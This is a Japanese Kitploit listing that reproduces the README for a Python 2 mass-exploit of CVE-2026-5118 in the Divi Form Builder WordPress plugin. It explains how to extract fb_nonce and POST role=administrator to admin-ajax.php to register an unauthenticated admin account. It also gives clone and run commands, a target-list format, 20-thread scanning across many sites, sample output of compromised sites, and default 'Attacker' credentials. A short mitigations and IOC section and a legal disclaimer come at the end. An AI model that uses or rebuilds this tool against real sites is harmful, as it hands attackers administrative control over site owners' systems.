Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5118 — CVE-2026-5118 – Divi WordPressプラグイン向けPython2マスエクスプロイト。admin-ajax.php経由の未認証の管理者登録。nonce抽出機能付きマルチスレッドスキャナー。 | Kitploit
ツール/GitHubGitHub/jenderal92/cve-2026-5118
特権昇格脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHubjenderal92/cve-2026-5118

CVE-2026-5118

CVE-2026-5118 – Divi WordPressプラグイン向けPython2マスエクスプロイト。admin-ajax.php経由の未認証の管理者登録。nonce抽出機能付きマルチスレッドスキャナー。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Divi Form Builder <= 5.1.2 - 'role' による未認証の権限昇格

⚠️ 警告: このツールは、許可された侵入テストおよびセキュリティ研究専用です。
許可なくコンピュータシステムにアクセスすることは違法です。所有しているシステム、または明示的な書面による許可を得たシステムでのみ使用してください。 詳細な免責事項は、Jenderal92 のカバーに記載されている免責事項をご覧ください。こちらで確認できます ここ!!!

概要

この Python 2 スクリプトは、Divi WordPress プラグイン(および関連する Divi フォーム)の権限昇格の脆弱性を悪用します。これにより、リモートから 管理者 アカウントを登録できます:

  • ターゲットの Divi 登録フォームから fb_nonce を抽出します。
  • role=administrator を指定した細工済みのマルチパートリクエストを /wp-admin/admin-ajax.php に送信します。
  • 成功を自動的に検出し、侵害された管理者 URL を保存します。

特徴

  • ✅ マルチスレッド(デフォルト 20 スレッド)による高速スキャン。
  • ✅ 自動 URL 正規化 – 欠落している場合に https:// を追加します。
  • ✅ 複数の正規表現パターン(インライン JavaScript、隠し入力、de_fb_obj)を使用した Nonce 抽出。
  • ✅ 正規のブラウザ送信を模倣した multipart/form-data リクエスト。
  • ✅ レスポンス内のキーワード(success、user_id、user created など)による 成功検出。
  • ✅ 結果は results.txt に以下の形式で保存されます:
    https://target.com/wp-admin/ | username | password

要件

  • Python 2.7(urllib2、Queue、threading を使用。変更なしでは Python 3 と互換性がありません)
  • ターゲット URL のリスト(1 行に 1 つ)

インストール

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py

使用方法

1. ターゲットリストを準備する

1 行に 1 つのドメインまたは URL を記載したテキストファイルを作成します。http:// / https:// は省略できます。スクリプトがデフォルトで https:// を追加します。

targets.txt の例:

root@kitploit:~
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org

2. エクスプロイトを実行する

root@kitploit:~
python CVE-2026-5118.py targets.txt

3. 出力例

root@kitploit:~
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4

4. 結果ファイル(results.txt)

root@kitploit:~
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+

設定

スクリプトの先頭にある以下の変数をカスタマイズできます:

仕組み

  1. URL を正規化 – スキームが指定されていない場合に https:// を追加します。
  2. nonce を抽出 – ホームページ(または登録ページ)を取得し、正規表現パターンを使用して fb_nonce を検索します。
  3. リクエストを構築 – 以下を含む multipart/form-data POST を構築します:
    • action=de_fb_ajax_submit_ajax_handler
    • fb_nonce=<抽出された nonce>
    • role=administrator
    • de_fb_user_login / user_login
    • de_fb_user_pass / user_pass
    • de_fb_user_email / user_email
  4. admin-ajax.php に送信 – レスポンスに成功キーワードが含まれている場合、ターゲットは脆弱としてマークされます。
  5. 結果を保存 – 管理者 URL と認証情報を出力ファイルに書き込みます。

検出と緩和策

Divi を使用している WordPress 管理者向け:

  • Divi および関連するすべてのプラグインを最新バージョンに更新します。
  • 不要な場合は公開登録を無効にします。
  • セキュリティプラグイン(Wordfence、Sucuri)を使用して admin-ajax.php リクエストを監視します。
  • すべての登録フォームに reCAPTCHA を実装します。
  • 操作可能な role パラメータを含む登録フォームを公開しないでください。

侵害の指標(IOC):

  • action=de_fb_ajax_submit_ajax_handler を含む予期しない admin-ajax.php リクエスト
  • 疑わしいユーザー名(例: Attacker)を持つ新しい管理者ユーザー
  • アクセスログ内の role=administrator を含む POST データ

法的免責事項

このソフトウェアは、教育目的および許可されたセキュリティテスト専用に提供されています。作者は、このツールの誤用または損害について一切の責任を負いません。本ソフトウェアを使用することにより、以下に同意したものとみなされます:

  • テスト前にシステム所有者から書面による許可を取得すること。
  • 該当するすべての法律(CFAA、Computer Misuse Act、UU ITE など)を遵守すること。
  • 取得した不正アクセスを直ちに削除すること。
  • 影響を受けるベンダーに脆弱性を責任を持って報告すること。

これらの条件に違反すると、刑事訴追、罰金、または禁固刑につながる可能性があります。

貢献

改善点(Python 3 移植、より優れた nonce 抽出、追加の登録パス検出)に関するプルリクエストを歓迎します。倫理的な免責事項を維持してください。

ツールをダウンロード
変数デフォルト説明
DEFAULT_USERNAMEAttacker登録するユーザー名
DEFAULT_PASSWORDAttacker@123#+パスワード(特殊文字を含む強力なもの)
DEFAULT_EMAIL[email protected]メールアドレス
THREAD_COUNT20同時スレッド数
OUTPUT_FILEresults.txt成功したターゲットを保存するファイル